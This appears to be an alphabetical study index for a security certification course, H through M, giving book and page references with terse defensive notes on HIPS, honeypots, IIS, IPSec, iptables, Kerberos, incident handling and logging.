HIPAA                              2   178   health insurance portability and accountability ACT of 1996
hips                               3   232   hips tools use combination of signature analysis and anomaly analysis to identify attacks
hips advantage                     3   233   the ability to STOP attacks from being successful, +all the adv of HIDS
hips application behaviour         3   236   manufacture select supported App and record the intended functionality of the App in normal use
hips challenges                    3   234   False positive, implement& maintenance, limit App support, more sys resources, limited nodes for Mang console

hips details                       3   232   stop known &unkonwn attacks,system call interception,monitior traffic on network, file integrity & app behavior
hips developments                  3   238   zeroday vuln protection, application shielding behavior,
hips mangment consle               3   235   max about 3000 node per one console
hips recommendations               3   237   Document procedures, develop mang policy, don't blindly install s/w updates, don't rely solely on hips.
hips -zero day protection          3   238   zero day protection build into hips
                                             it's a Graph that represents the number of occurrence of data in a given distribution of data (frequency of
Histogram                          4   37
                                             characters varies great)
                                             the ability to communicate with the machine to insert inputs and command for it. @ BlueTooth. The lack of HMI
HMI - human to machine interface   4   151
                                             results in fixed PIN selection for bluetooth devices like handsets ('0000' or '1234').
honey token                        3   185   labeling information with unique keywords,project id
honeyd                             3    83   can design any honeypot as a sepecific os,using nmap,Xprobe database
honeynet project                   3    85
honeypot                           3    72   is an information system whose value lies in unauthorized use of that resource
honeypot                           3    72   dedicated server,state machine,service,virtual server,honeytoken
honeypot advantages                3    76   insight (tactics,motivs,tools of attacks), reduce false positive,false negative,addiitional DID
honeypot checklist                 3    89
honeypot deplloying                3    87   start with low-interaction,unused address space,monitor honeypot out of band
honeypot disadvantage              3    78   fingerprinting,limited view,resource buden
                                             attackers use the identity of a honeypot to throw off admins by spoofing traffic from legal to honeypot, feading
honeypot fingerprinting            3   78
                                             honeypot with incorrect info
honeypot liability                 3    73   civil issue,attacker may harm othe networks from your honeypot
honeypot types                     3    80   purpose,location,scope,interaction
honeytoken                         3    72   a single file with special attributes
host os                            1   177   the main os that runs virtual machine
host.equiv file                    3    9    allow user to use r-commands,include machine and local user account,without password
                                             small program will update few os files with updated versions == hotfixes-patch one security hole by replace oneor
hotfix                             5   57
                                             more of sys file ==fix single problem==
hotfix newsfeed                    5   58    sites::sans,microsoft,securityfocus,packetstormsecurity.nl == easiest way to stay on top of new patches
HP sitescope                       2   271   web service monitoring tool.
Hping3                             3   114   like ping using tcp crafted packets, used to assess firewalls
Hping3 features                             3     116     test firewall rules,net performance,fingerprint os,audit stacks,transfer files,check if a host is up
HP-UX pkg manager                           6     167     swinstall,swremove,swverify
HTML form example                           2     229
HTML Forms                                  2     227     take user input ,dynamic (java script)
HTML(Hypertext Markup language)             2     226     tool like DreamWeaver
htr buffer over flow                        5     241     require *.htr mapping on win 2000
HTTP                                        2     222
http 400 bad requesst                       2     271     some thing abnormal in headr,indicate scanning or attempt to exploit a vuln
http 403 forbidden                          2     271     usr attempt to load content not authorized to do
http 404 not found                          2     272
http 500,501,503                            2     272   server error or time out,
HTTP Authentication                         2     247   user Authentication sent in HTTP header,Basic Authentication,digest Authentication
HTTP Header / Metadat                       2     222   request or response:browser|s/w version,content types,languages&protcols accepted,cache
                                                        most web server maintain logs which track the originating ip address of each connection. File entries: originating_IP
http logs                                   6   130,131 notused username date&time Actual_text_of_the_request error code (200 ok, 404 file not found)
                                                        no_of_bytes_returned_to_the_browser
HTTP Methods                                2     217   GET,POST,HEAD,PUT
HTTP Status code                            2     222   200->success,300->redurection,400->bad req,500->server error
HTTP Status code                            2     225   BAD request(401unauthorized,403forbidden,404not found ,etc),500range:Server Errors or time out
HTTP Transactions                           2     224
http tunnels                                3     106   p2p programs use it to send data,stunnel can be used for this,port80,port443
humidity detectors                          1     227   a detective control used to detect water/flood ,used for water vapor
HVAC (heat ventialation air conditioning)   3     154   heat ventialation air conditioning may use active phone system,skip them when running war dialer
Hybrid attack                               2     123   Hello==he110
Hyper-V (HyperVisor)                        5      15   built in server2008 -64bit only,is virtual machine system
ibm iss inline protection                   3     250   full on Nips,all malcious traffic blocked
ibm iss inline simulation                   3     250   monitor only mode, it provides monitoring on life to tune your policies before live implementation
ibm iss passive mode                        3     249   G series, like IDS, block malcious traffic by sending tcp rst to offending connection
ibm iss proventia                           3     249   nips, G-series provide high speed deep inspection, M series provide unified threat management
ibm iss proventia G series                  3     249   throughput: from 100mb to 2gb, Modes: passive monitoring, inline simulation, inline protection
ICACLS.exe                                  5      90   built in 2008/vista,modify ntfs permissions
ICACLS.exe                                  5     117
icmp payload                                1     119   the header of ip packet+ 8bytes of ip payload which include the source and destination ports
ICMP (internet control message protocol )   1     118   icmp is encapsulated in ip packet,connection less,error reporting,network troubleshooting
icmp common types                           1     120   typ8 echo req,typ0 echo reply,typ3 destination unreachable,typ5 redirect,typ11 time exceeded
Icmp error packets                          3      59   issue to state firewalls because a legal packet can't pass,udp-->port unreachable
icmp rate limiting                          3     128   set limits on how many icmp packets they are willing to send out during a certain time
icmp security issues                        1     122   covert data channel,denial of service,map a network
id command                                  6     49    show effictive username and id, user's groups and their id (primary and secondary groups)
Identity                                  2   106   who you claim to be done by Authorizatio,Authen
IDS                                       3   166   alarm system,needs incident handler,not low maintaince tool
IDS - modern ids                          3   182   use comination of deep and shallow inspection
IDS - What is IDS not?                    3   167
IDS alerts                                3   171   true positive, false positive ….
ids blade                                 3   207   Modul inserted into the switch cusrom hardware
IDS EOI                                   3   171   an event of interest ,can be anything the analyst want to identify with ids
ids evasion                               3   183   attackers change data charecteristics to pass the ids,de-normalize traffic
                                                    to distribute the packets on your network tp multiple identical IDS's, if you've tuned your IDS for speed and the
IDS load balancer                         6   197
                                                    system still can't kee up
IDS plus something                        3   249
IDS Technology                            3   168
IEEE 802.11 specification                 4   163
IEEE 802.11 wireless                      4   163   support Ad-hoc, Infrastrucuture networks, , 802.11a, 802.11b, 802.11g, 802.11n
                                                    accommodates two replacement for WEP:( TKIP, CCMP), provide strong encryption, reply protection, integrity
IEEE 802.11i                              4   167
                                                    protection (using: TKIP or CCMP), but doesn't provide Authentication
IEEE 802.11x                              4   167   provide network authentication, by using: EAP
IEEE 802.1x authentication - Deployment   4   168   need three components: 1-supplicant, 2-Authenticator, 3-Authentication Server
                                                    used by internet explorer to run active x control when MIC is low,same as ieuser.exe == run by IE in high
ieinstall.exe                             5   182
                                                    previlage"broker process"
                                                    used by internet explorer to run active x control when MIC is low,same as ieinstall.exe == run by IE in high
ieuser.exe                                5   182
                                                    previlage"broker process"
IIS ( Information Internet Server )       5   233   version 7 on server 2008
IIS (Information Internet Server)         5   233   collection of services can be installed seperatly or not inculding HTTP,FTP
IIS 7                                     5    15   new graphical interface,modularized,Ftp-over-ssl is available
IIS access controls                       5   243   tls/authentication requirements/ip address restrictions
IIS Basic Authentication                  5   244   compatible with all browsers,send passwords unencypted,use ssl with it
iis directory handler                     5   240   when directory list is generated
IIS enable loging                         5   246
iis exchange folder                       5   242   used by outlook web access site for exchange server
iis folders not to have                   5   242   scritpts , cgi , msadc , printers , iishelp , iissamples
IIS handler                               5   240   Iis component that handle process certain request,Dll,exe
iis handler managed code                  5   240   .net type,c#,vb.net code
iis handler native code                   5   240   compiled from C++ code
IIS host header                           5   238   can host many site simultanously by three ways : port,ip,host header
                                                    IIS will drop processing the request & return error msg , to create newsite open IIS manager console ,, configure
IIS host header                           5   238
                                                    existing website ,,
IIS is member server /domain member       5   234   it should not be member of the main internal forest but for separate forest
IIS IUSR_computername                     5   237   account for anonymous http access to IIS
IIS logging                                  5   246   per-site,per-folder,per-file,by default everything will be logged
iis msadc folder                             5   242   protects a machine from old rain forest puppy rds exploit on iis4
IIS NTFS permissions                         5   236   System:full control , Adminsitrators:full control , Everyone:read & excute
                                                       Have separate drive volumes for OS and web content , apply suitable security template from microsoft or CIS to OS
IIS NTFS permissions                         5   236
                                                       volume , configure NTFS permissions by principle of least priviledge
IIS Patched Install                          5   234
IIS security loging                          5   246   NTFS permissions Allow full control system & admin. , Deny full control IUSR
                                                       to install Web server IIS role , run server manager to install the component need by check box to select adding app.
IIS server manager                           5   235
                                                       Like (ASP,ASP.net,CGI)
iis staticFile handler                       5   240   when static html is requested
IIS urlscan.dll                              5   245   free application firewall for iis5/6 scan http requests and reject bad requests
IIS7 requestFilteringModule                  5   245   can be configured through xml files,like urlscan.dll
IKE internet key exchange                    4   97    protocol used by IPSEC to negotiate the session details of a connection and then document them as Sas.
Incident                                     2   155   one or multiple Events+harm or attempt to do harm
Incident                                     2   157   jarm or thret of harm ex NetBios scan on unix is threat of harm
Incident Handling                            2   153   first Aid
incident handling steps                      2   159   Preparation, identification, Containment, Eradication, Recovery, Lesson learned
Incident Handling-Containment(3)             2   166   isolate and eliminate source of the incident
Incident Handling-Eradication(4)             2   168
Incident Handling-identification(2)          2   164   IDS,logs,system reboots,poor performance,notify correct people,utilize help dsk
Incident Handling-identification(2)          2   165   assign primary handlr,identify evidence,
Incident Handling-Lesson learned(6)          2   172
Incident Handling-Mistakes                   2   173
Incident Handling-Preparation(1)             2   160
Incident Handling-Preparation(1)             2   162
Incident Handling-Recovery(5)                2   170
Incident Handling-summarry                   2   174
inclusive log monitoring                     3   212   alist of keywords or phrases that define event of interest,match ---> alert
incremental mode                             2   126   most powerfull,most time-consuming,try all combination of letters,numb,special char
indication and warning                       3    49   a technique to determine what the attackers are going to do before they do it
indication and warning Model                 2   205
inernet security & accelration server        5   230   ISA,doesn't have vpn built in
                                                       super server daemon responsible for starting network services when there is a request (not at boot as init) service
inetd                                        6   76
                                                       must be listed in 2 files (/etc/inetd.conf,/etc/services)
inetd                                        6   106   Internet service Daemon "Super Server" used to manage most of tcp/ip daemons
inetd - examples from /etc/inetd.conf file   6   107
inetinfo.exe                                 5   240   dlls excutables loaded in memory address space of web service itslef
INF Security                                 5   193   service startup settings
info warfare - Offensive player     2   207   insider,attacker,criminal,terrorists,governmnts,corporstion
                                              Identify critical assets and provide layerd protection,the center is ur assets ,then it is protected by diff
Information Centric                 2   17
                                              layerapplication,host& net.
information security cycle          3    18   consist of three parts:preventation,detection,response
information Warefare theory         2   202   Asymmetric warfare, Cycle time, Palyers and roles, indication and warning
Information Warfare                 2   192   competition bet offensive and definsive player
information warfare examples        2   194
information warfare tools           2   197   perception management (Social Engineering) ,malicious code,predictable response
ingress filtering                   3    53   a filtering is applied to incoming traffic,most of firewall rules applied to inbound traffic
                                              after kernel loading it is a program provide layer between kernel and user, is starts when the compouter boots and
init process                        6   74
                                              continues till the system shutdown.
                                              startup some initial system processes that allow other processes to be run, these processes manage system as:
init process                        6   83
                                              virtual memory system and process scheduler
init styles                         6   74    sysV (as in debian/ubuntu and redhat/fedora), and BSD (as in free BSD and other BSD distributions)
                                              define the run levels, and is divided into: 1st section (passes default run level), 2nd contain (location of the script to
inittab                             6   88    be run before all others ), 3rd (locate all run condition dir on the system ) as when alt-ctl-del press, UPS poweroff ,
                                              no of tty started
injection vector                    3    32   an excessive content injected by attacker to overwrite the return address by address of his own.
inPrivate filter                    5   187   IE8,maintain privacy against attempts to track users via multiple sites
input attacks                       2   257   OS command injection,Buffer oveflow,SQL injection,XSS
INPUT TYPE="PASSWORD"               2   248   will put asterisks rather display password
insider,internal threat             1     7   someone has access to information,consider all access to lan resources when evaluating
Instant Messaging application       2    41   messenger ICQ
Insurance model                     2    88   plan for worst hope for best
integrated windows authentication   5   249   in sql server,authentication method using active directory and kerberos
Integrity                           4    12   prove the message has not been tampered
intel x86 processor                 3    32   little endian you have to conver to big endian in network connections
Intellectual Property               2    79   Copyright:
intellectual property               4   241   organisation owns what u develop while employes.
interim report                      3   283   risk management step5,project summary,asset identification,plan to recommendations
Internal PKI                        4   118   some companies uses PKI as basis for NAC solutions.
Internet                            1     7   connects many lan man wan together in the world largest network.
Internet explorer                   5     8   IE7 not included in xp sp3 ,upgrading IE must be performed separately
internet explorer                   5   183   99% of IE settings usin GP , few change will block most exploits even without patches but these change breack func.
internet explorer 8                 5    12   inclued in windowes 7 by default
internet explorer hardneing         5   184   *******2 pages*******
internet explorer protected mode    5   181   on:when MIC of explorer is low,off:when explorer run by administrator
internet explorer protected mode    5   182   special folder when running with MIC :low
internet explorer security                                    5   181     IE8 or later launch seprate process Iexplorer.exe
internet printing buffer over flow                            5   241     require *.printer mapping on win2000
interspect                                                    3   251     internal security gateway that builds SmartDefense technology
                                                                          a^x mod n = b , mod(means remainder), very difficult to be solved, used by: EL-Gamal, Diffie-Hellman, Schnorr
Intractable - discrete algorithm problem                      4    54
                                                                          signature scheme, digital Signature Algorithm
                                                                          hard problem, use Elliptic Curve Cryptosystems (EEC) which offer [Higher speed, lower power, tighter code], used
Intractable - discrete lgorithm problem applied to elliptic
                                                              4    55     by: Elliptic Curve EL-Gamal, Elliptic Curve Diffie-Hellman, Elliptic Curve Schnorr signature scheme, Elliptic Curve
curve
                                                                          digital Signature Algorithm (ECDSA)
Intractable - factoring integer problem                       4    53     Difficulty of factoring a large interger into its two prime factors, hard problem solved by trial & error, used by RSA
                                                                          Very hard problems that can't be solved in a polynomial time(Asymmetric encryption), like exponential O(2^n),
Intractable problem example                                   4   51-52
                                                                          superpolynomial, cubic-time algorithm, exponential-time algorithm
intrupts                                                      3     39    calls for software or hardware needs to be handeled,an attacker can use it to call malcious code
IP (Internet Protocol)                                        1     49
ip checksum                                                   1    158    16's bit one complemnt of ip header only
Ip timestamp                                                  1     51    tells routers to write timestamp into the options field
IP(Instruction Pointer)                                       2     24
IPC$                                                          5    105
ipchains                                                      6    175    old builtin firewall
ipconfig.exe                                                  5    228
ipconfig.exe                                                  5    283    variety of ip settings
IPFW                                                          6     14    personal firewall installed and on by default in MAC OS
ipfwadm                                                       6    174    old builtin firewall
IPS                                                           3    229    will try to stop attack before they are succesful, but it prevent passively unlike Firewall.
ips -- how it stop attack                                     3    229    by: sending REST & modify firewall rules.
ips -- what is IPS is not                                     3    230    ……….
IPS &IDS                                                      3    229    IDS is deployed PASSIVELY, while an IPS is traditionally deployed INLINE
IPSec                                                         4     92    RFC 2401, scale from small to v. large networks, commonly implemented.
Ipsec                                                         5    220    mutual authentication,encryption,packet signing,ipsecpol.exe,ipseccmd.exe,netsh.exe
IPSec - authentication header (AH)                            4   93-94   Integrity, No confidentiality, anti-reply, origin authentication
                                                                          ISAKMP(internet security association and key management protocol, protocol used by IPSEC to negotiate the session
IPSec - internet key exchange IKE                             4    97
                                                                          details of a connection and then document them as Sas.
IPSec - encapsulation security payload (ESP)                  4   94-95   Integrity (not perfect integrity), confidentiality, anti-reply, origin authentication
IPSEC - Headers                                               4    92     Authenticaton Header (AH), Encapsulated Security Payload (ESP)
IPSec - mode types                                            4    96     tunnel mode, transperent mode
IPSec - NAT                                                   4   102     NAT is incompatible with IPSec AH ,but NAT can be used with IPSec ESP in two modes tunnel and transport
IPSec - Null algorithm                                        4    95     it does nothing to the msg, used if u want to turn-off encryption on IPSEC
                                                            is to copy the msg from the network, & retransmit it even if the attaker can't undersatnd it, this would cause
IPSec - Replay attack                         4     92
                                                            undesired results, ex: retransmitting a request packet to transfer $1000
                                                            critical part of IPSEC, they document the security services (transformers) that is used by specific IPSEC connection, &
IPSec - Security Associations                 4     97
                                                            must be agreed by both sides of the IPSEC
IPSec - session establishment                       97      the two sides of connection must agree on what options they are going to use, Session Assosiation
IPSec - Tunnel mode & AH                      4     96      authentication, integrity
IPSec - Tunnel mode & ESP                     4     97      encryption, authentication.
ipsec & Group policy                          5     223
IPSec => IKE => Oakley                        4     97      key exchange
IPSec => IKE => SKEME                         4     97      secure key exchange mecchanism, extend the capabilites of Oakely.
IPSec => IKE =>ISAKMP                         4     97      key management
IPSec- AH => ICV(integrity check value)       4     93      to prevent spoofing IP address and to verify Integrity there is not anyone tampered with info.
ipsec client respond only                     5     224     pc will not require or request ipsec,but ipsec is enabled,GPO option
                                                            block all packets netsh.exe--->netsh.exe ipsec deunamic add rulearcaddr=any dstaddr=any ,, allow ICMP packets
ipsec commands                                5     221
                                                            ...… ,, allow packets to/from TCP port 80 ……… ,, to getrid of thepolicy & its rules …..
ipsec request                                 5     223     pc will attempt to use ipsec if not will back in plain text for backward comptability
ipsec require in Organization Unit            5     225     secure server (require security) , server (request security)
ipsec secure server require security          5     225     ipsec policy with 3des mutual authentication,only ipsec is allowed,GPO option
ipsec server request security                 5     225     will request mutual authentication but will fail back to text if client doesn't support ipsec
ipsec+l2tp vpn                                5     226     nat problems espcially with more than 1 natting device
IPSec=>phase one => aggressive mode           4     98      does not check the identity of the participant
IPSec=>phase one => main mode                 4     98      check the identity of the participant
IPSec=>phase two => quick mode                4     98
ipseccmd.exe                                  5     221     windows xp,download from microsoft,to configure ipsec
ipsecpol.exe                                  5     221     windows 2000 resource kit to configure ipsec
                                                            current packet filtering, it is modular ( can check packets that is not part of iptables by add new test to kernel
iptables                                      6     175
                                                            without reboot and define action to take ,fast), & can work as a NAT Box.
iptables {checks} {action} command            6     176     perform this action if the packet matches all checks else continue to next rule so it built up the kernel table
iptables -A INPUT …                           6     180   append this rule to a rule chain (put it on the bottom)
                                                          iptables cmd tells kernel what to check and kernel does the actual check (from top of rules list to down ) and if find
iptables basics                               6     176
                                                          one match make the action
iptables -D                                   6     179   user same command with -I option to delete rule
iptables -d (or --destination)ip or ip/mask   6     176   destination ip or network
iptables downside                             6     175   focus on packet headers only
iptables -dport                               6   176,180 destination port ( single port or port range as start:end )
iptables -i                                   6     181   only match if packet come from specific interface
                                                      FORWARD --> filter packets to server accessible by another NIC on the firewall(going throughthe system), INPUT--
iptables -I FORWARD|INPUT|OUTPUT          6   177,179 >filter packets destined to firewall(coming into the system), OUTPUT --> filter packets originating from the
                                                      firewall(created by the system)
iptables -I FORWARD|INPUT|OUTPUT          6   179,181 iptables -I insert at the top of the current rule list, iptables -I chain ruleno( put this in specific chain and make it no x)
                                                         action done( ACCEPT --> accept packet,REJECT -->reject packet and notify the sender,DROP-->silent ignore the
iptables -J DROP|ACCEPT|REJECT|LOG        6   176,181
                                                         packet,LOG -->log the packet and continue process more rules
iptables -j LOG                           6     180      log the packet, and continue processing more rules in this chain, Allows the use of --log-prefix & --log-level
iptables -L -nxv |less -S                 6     179      to see the active firewall rules (-L list the current filter rules)
                                                         the max. matching rate given as number followed by (/second,/minute,/hour), if this option isn't used & -m limit is
iptables --limit                          6     180
                                                         used -->the default is 3 hours
iptables --log-level                      6     181      log using specific log level,7 is good choice
iptables --log-prefix "text"              6     181      when logging, put this text before the log msg
                                                         require the rule to match only a limited no of times ( useful for limitation logging rule), premit the use of --limit
iptables -m limit                         6     180
                                                         option
iptables -m state                         6     180      allow filter rule based on connection state, premit the use of --state option
                                                         two built-in chains to place a NAT policy rules: Pre-routing chain --> NATs packets when the dest. Address of packet
iptables- NAT                             6     178
                                                         needs to be changed, Post-routing chain --> NATs packets when the source Address of packet needs to be changed
iptables -o (--out-interface)             6     181      outname+network interface name (+is wild card)
iptables -p tcp                           6     176      protocol used
iptables -p udp -I forword -dport 1434    6     182      to block worm traffic
iptables -s (or --sourse) ip or ip/mask   6     176      source address ip or network (used to block attacker)
iptables -sport                           6     182      source port ( single port or port range as start:end )
iptables --state                          6     180      define list of states for the rules to match on (NEW,RELATED,ESTABLISHED,INVALID)
iptables -v                               6     181      display more info (useful if u have look similar rules)
IPv4 header                               1      51      minimum 20 byte maximum 60 byte
IPv4 header - bytes number                1      54      byte 9:protocol number,byte 10,11 protocol check sum
IPv4 header- fields -                     1      52
IPv4 options - strict source routing      1      51      allows sender to specify exact route for destination
IPv4 options- loose source routing        1      51      allows sender to specify a list of routers a packet must pass through .it may also traverse other routers if required
IPv4 options- record route                1      51      tells routers to add its ip address into the options field
ipv4 over ipv6 (translation)              1      82
ipv6 features                             1      82
ipv6 address space                        1      80      340 undecilion address
ipv6 autoconfiguration                    1      82      based on local mac address and information from default gateway
ipv6 fixed header size                    1      82      40 bytes of fixed size
ipv6 header                         1    85   flow label and traffic class are used for Qos
ipv6 network prefix                 1    83   FE80 local network,FF00 multicast traffic,2001 large isp interdomain,2002 ipv6 to ipv4 gateways
ipv6 next header                    1    82   it's like the protocol field in ipv4 ,currently support AH and ESP
ipv6 over ipv4 (tunnling)           1    82   use of ipv4 protocol number =41
ipv6 vs ipv4                        1    81   ipv6 support authentication,encryption and quality of service
IRC(Internet Relay Chat)            2    38   used as channel that worm use to comm with its creator
irreversible encryption             2   117   one way hashing ,one way encryption
ISAKMP                              4   97    key management
ISC (internet storm center)         3   222   is a powerfull tool for detecting rising internet threats (isc.sans.org )
ISDN                                1    18   service profile identifier =10 digit isdn connection identifier =4 digit,problem backdoor
ISMS                                2    71   is process by which org formulates security policy based in ISO17799
ISN guessing drawback               3    15   it only works with idle machines so you need a machine doesn't accept a lot of connections
ISO 17799                           2    59   Information security standard
ISP (Internet service provider)     1    7    responsible for intergrity and connectivity of all lans ,wans,mans
Issue-specific Policies             2    67   Ex. User authintications, password policy , acceptable use .. Etc
Issue-specific Policies             2    71   password procedures,internet usage guidelines,not boarder than program policy
Issue-specific Policies Example     2    77   NDA and Copyright
IW - Confidentiality attacks        2   209
IW - Cycle time                     2   204   time to decrypt info,time bet vuln and patch and release of worm
IW - Decrease value to defense      2   210   derease integrity,decrease availability
IW - Defense is not dominant        2   211
IW - increase value to offense      2   209
IW - indication and warning         2   205
IW - offensive operation goals      2   208   is to cause harm ,win-lose situation,more valuable to offense-less to defense
IW - Offensive player               2   207   insider,attacker,criminal,terrorists,governmnts,corporstion
IW (Information Warfare)            2   192   competition bet offensive and definsive player
IW -Asymmetric warfare              2   202   small investment has very large effect
jackal                              3   117   uses syn/fin scans to evade firewalls
java applet(Signed java applet)     2   239   allow usr to assign policy that offer control (ex-auther identity,source code)
joeware                             5   284   active directory tools
joeware                             5   284   tools to enforce passwords to expire,list groups of user,unlocking user accounts
John Ripper support                 2   126   DES,2DES,BSDI,MD5,Blwfish,Andrew file systemAFS,NTLM password
John Ripper support Cracking mode   2   126   each mode crack pass in diff way
John the Ripper+MD5                 2   125
john.ini                            2   126
Julius Caersar                      4    7
jumbo-sized frames                  1    11   optimize network timing For use of maxinum bandwidth efficiency
Jump Bage content                   2   163
                                                 Default ,AD is the key ditribution center for kerberos, your kerbores key is derived from your password, kerberos-
kerberos                               5   36    appl in windows don't need to be kerberized like unix, kerberos-found in IKE,RSVP but not in(FTP,telnet), kerberos-
                                                 faster than NTLM&clients can cashe&reuse their ticket
Kerberos - Authentication              2   113   use Kerberos V5 don’t send pass through Network
                                                 if intial kerberos exchange captured can be vulnerable to bruteforce ,Kerberos-vulnerable to bruteforce , ticket
kerberos cracker                       5   37
                                                 request encrupt by user password
kerberos port numbers                  5   208   tcp/udp/88,tcp/udp/464 for kerberos change password,tcp749,tcp/2053
kerberos process                       5    36
Kerberos tickets                       5   171
kerberos used protocols                5    36   Kerberos-found in SMB/CIFS,RPC,LDAP,HTTP,dyn DNS,IPSEC ,IKE,RSVP, NOT FOUND in FTP , TELNET
kerberos&NTLM2                         5   172   lan manager authent level-GPO security option , NTLMv2 not vulnerable to cain + rainbowcrack , Kerberos uses UDP
kernel                                 6   25    memory residant part of the Osloaded in memory at boot ( manage HW and the executing processes)
kernel                                 6   82    software repsonsile for (initialize & manage HW resources, handle communication between app and HW devices)
kernel services                        6   26    File system,low level network protocol support ( ip),memory and process management
key catcher                            1   214   a small 2" device to capture key stroke ,memory up to 8 mbyte
Key focus of Risk                      2    8    CIA !=Disclosure,Alteration,Destruction
Key Length Comparison                  4    71   compare keys of: 3DES, AES, Diffie-Hellman, RSA, ECC key length.
key recovery                           4   122
Keystream of stream cipher             4    24   keystream length must = plaintext length, generated at both sending and receiving ends.
kismet                                 3   148   intrusion detection tool,wireless passiv scanner,attacks against LEAP protocol
kismet color codes                     3   149   green=secure,red=factory settings,
kismet interface                       3   149
kismet_drone tool                      3   148   lightweight kismet, deployed in client/server infrastructure to monitor wireless from attacks
                                                 cryptanalyst knows: 1 plaintext + 1 ciphertext, wants to know: key or another algorithm to decrypt any msg with a
Known Plaintext attacks                4   73
                                                 key the cryptanalyst knows
kuang2 virus                           3    65   all infected systems listen to the 17300 tcp port
L2tp (layer two tunnling protocol)     5   226   assist ipsec in taks as user authentication and RADIUS policy enforcement
LaBrea Trapit                          3    89   Honeypot tool
Lan                                    1    6    is owned by single entity,trusted users access network and server resources
Lan man                                2   128   hashing algo,to identical pass will be the same encryption
Lan Manager Authentication Level GPO   5   172   send NTLMv2 response only , refuse NTLMv1
Lan threat                             1    6    disgruntled employee or trustworthy employee who was fooled.
                                                 use wtmp log, it's output is: ( userID, terminal ID, remote host ID, connection date, time on, time off, session
last command                           6   124
                                                 time), & it read in the reverse order.
LAST-ACK                               3   58    the other host received the fin and acknowelde
                                                 binary log file, keep track of user last most recent log in date & time, record initiating ip add, display each time the
lastlog                                6   127
                                                 login program is run
Latency                                 2   271     time between making request and seeing result
layer independence                      1    46     make it faster to write network programs but make it secuirty weaker
lcredit=$                               6    60     minimum no of lowercase letters is $ in/etc/pam.d/system-auth in pam_cracklib argument
LDAP                                    5   208     cleartext:tcp389,ldap ssl encrypted:tcp636,global catalog:tcp3268,global catlog encryp:3269
least priviledge - OPSEC                4   242     ensures that only the min required access rights are given at anytime.
Leaves Worm                             2    38     backdoor,scan for infected subseven trojan,authen it using master pass,remove it
Legal aspects of Incident Handling      2   174
Legal system                            2   176     common law, civil law
legion                                  3   113     can detect unprotected netbios file shares
libcap                                  1   138
liberal approach(‫)متحرر‬                 2    56     more informal but high risk
Libpcap libaray                         3   195     open-source ,designed to retrive data from the Kernal and pass it to the Application Layer (TCPDump Linux )
Libpcap Products                        3   195     Shadown,Snort,Cisco IDS and NFR
                                                    have a impressive list of CGI vuln, can berform brute force URLs, muck with cookies ..etc, foundation of Whisker
libwhisker                              2   275
                                                    scanner
lightweight directory access protocol   5   208     LDAP,deafult protocol for searching and editing active directory database
                                                    one type of boot loader, add 2 lines at the top of the file to make passwd to boot loader (password=<your
lilo.conf                               6    85
                                                    password>, then restricted)
limited broadcast                       1    62     not passed by router 255.255.255.255
linear time                             4    51     O(n)
linus torvalds                          6    16     creator of linux kernel ( rewrite Minix for intel 386 platform) his code represent only 2% of the kernel now
linux and DOS corresponding commands    6   32,33
linux file permission                   6    34
linux importance                        6    17
                                                    allow you to test drives,no HD required or installed, excellent for forensic work and troubleshooting also used for
linux live cd                           6    23
                                                    rescue and recovery
linux other security options            6   199     Boot Loader Password, PS, Netstat
linux proxy applications                6   175     squid (Web and FTP), bind (for DNS), postfix (for e-mail). & can coexist with Iptables
linux vs. cygwin                        6    9      cygwin not for something you can depend on to work consistently
Linux Worms                             2    28     Ramen,lion,
Lion                                    2    29     open root shell&trojaned version of SSH,can't clean,use vuln BIND name server
List based Access control               2   110     associates user and their privilge with each object
list of resource kits                   5   272     *********3 pages **********
list of resource kits 2                 5   275     ******** 2 pages **********
list.exe                                5   315     like the linux less command,open large iles but don't load entire file at once
little endian                           3    32     the most significant bit is on the right side of a byte 00000000x
live Distro                             6    23     as live CD but for any bootable media as usb,floppy,external HD,ipod
LMCompatability Level registry                        2   146
lmhosts file                                          1    72   contain mapping for netbios to Ip address
loadable kernel modules                               3    41   are called device derivers files used in creating rootkits
local accounts-Management                             5    25   account applet in control panal,start>administritve tools>computer manaement ,NET.exe
local GPO (Group Policy Object )                      5   153   mmc snap in,current pc setting except ntfs and regisrty key ACLs,applied automaticaly
local group policy object (GPO)                       5   155   can import security template in it ,some setting in template not in the GPO
LOCKD                                                 6   105   rpc service run by both clinet and server, it handle file lock
locking useraccount after fail logins                 6    62   in /etc/pam.d/system-auth in pam_tally module
locks                                                 1   238   traditional ,cipherlocks,smartcard,smartcard with passcode,biometrics
log consolidation                                     5   328   central database for all logs,psloglist.exe,dumpevt.exe
log file monitroing                                   2   271   monitor access log and error log.
                                                                Binary Log Files (utmp,wtmp,lastlog), Text Log Files (history files, sulog, httpd, syslogd, messanges/syslog, secure,
log files                                             6   122
                                                                ftplog, maillog)
log monitoring                                        3   212   inclusive or exclusive
log size in vista/7                                   5   326   no problem because xml logs can be compressed
log size in xp /2003                                  5   326   maximum of 4.2 Gb but actually 300mb
logevent.exe                                          5   318   write your own entries to event log using this command line tool
LOGEVEnt.exe                                              318
logging interval                                      5   247   use local time for file naming and rollover
Logic bomb inside lan                                 1    6    a threat that deleted all files inside company so they lost a lot of money because of lan trust.
logic bombs                                           3    28   small programs or sections of a program triggered by some event as a date or a time
logical topology                                      1   10    the process that protocol follows to send data regard less how physical it looks like (Ethernet, Token Ring)

                                                                The logrotate program is a log file manager. It is used to regularly cycle (or rotate) log files by removing the oldest
                                                                ones from your system and creating new log files. It may be used to rotate based on the age of the file or the file’s
logrotate                                             6   147
                                                                size, and usually runs automatically through the cron utility. The logrotate program may also be used to compress
                                                                log files and to configure e-mail to users when they are rotated.
logrotate use it instead of /etc/cron.daily/syslogd   6   149
logs wrapping options                                 5   327   three options,overwrite events as needed,overwrite older than x days,don't overwrite
logsurfer                                             6   152   log alert program
logwatch                                              6   152   log alert program
long-term solutions                                   3   286   involve redesign of infrastructure and increaed safeguard solution cost
LOPD                                                  2   178
low-land stack                                        3    33   starts with 00 in address,would indicate windowes box,limit size of payload
ls                                                    6   212   listing the contents of a directory
LSPP                                                  6   205   MLS enforce the bell-la padula mandatory access and is used in LSPP environment
MAC (Mandatory Access control)                        2   109   usr must have clearance to access data and usr cant givre it to other ex SELinux, require a lot of work to maintain
MAC address                             1     65
MAC OS file vault                       6     14    strong encryption user home dir it use 128-bit AES
MAC OS password assistant               6     14    grades strength of passwd red-->weak yellow --> passwd ok green--> strong passwd
                                                    UNIX/BSD and also have server edition 7% market share,2nd most popular os,it is more intuitivefor beginning uses
mac os x                                6     7,12
                                                    than windows and linux
macafee hips                            3     249   ids+something, use system call interception,was Entercept product
MAE (metropolian area exchange )        1       7   large peering points to provide connectivity between isps.
